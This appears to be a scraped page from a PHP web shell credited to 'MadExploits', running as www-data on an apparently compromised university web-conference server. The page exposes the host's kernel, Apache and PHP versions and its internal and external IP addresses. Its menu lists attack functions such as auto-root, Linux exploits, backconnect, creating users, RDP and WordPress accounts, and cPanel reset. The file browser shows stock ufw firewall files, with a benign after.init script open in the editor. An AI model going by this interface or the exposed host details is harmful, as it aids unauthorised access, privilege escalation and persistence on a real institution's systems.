Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.226.187.60
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
ufw /
[ HOME SHELL ]
Name
Size
Permission
Action
iptables
[ DIR ]
drwxr-xr-x
messages
[ DIR ]
drwxr-xr-x
after.init
1.1
KB
-rw-r--r--
after.rules
1004
B
-rw-r--r--
after.rules.md5sum
305
B
-rw-r--r--
after6.rules
915
B
-rw-r--r--
after6.rules.md5sum
248
B
-rw-r--r--
before.init
1.1
KB
-rw-r--r--
before.rules
2.48
KB
-rw-r--r--
before.rules.md5sum
558
B
-rw-r--r--
before6.rules
6.54
KB
-rw-r--r--
before6.rules.md5sum
693
B
-rw-r--r--
check-requirements
7.47
KB
-rwxr-xr-x
ufw.conf
312
B
-rw-r--r--
user.rules
307
B
-rw-r--r--
user.rules.md5sum
60
B
-rw-r--r--
user6.rules
107
B
-rw-r--r--
user6.rules.md5sum
61
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : after.init
#!/bin/sh # # after.init: if executable, called by ufw-init. See 'man ufw-framework' for # details. Note that output from these scripts is not seen via the # the ufw command, but instead via ufw-init. # # Copyright 2013 Canonical Ltd. # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License version 3, # as published by the Free Software Foundation. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # set -e case "$1" in start) # typically required ;; stop) # typically required ;; status) # optional ;; flush-all) # optional ;; *) echo "'$1' not supported" echo "Usage: after.init {start|stop|flush-all|status}" ;; esac
Close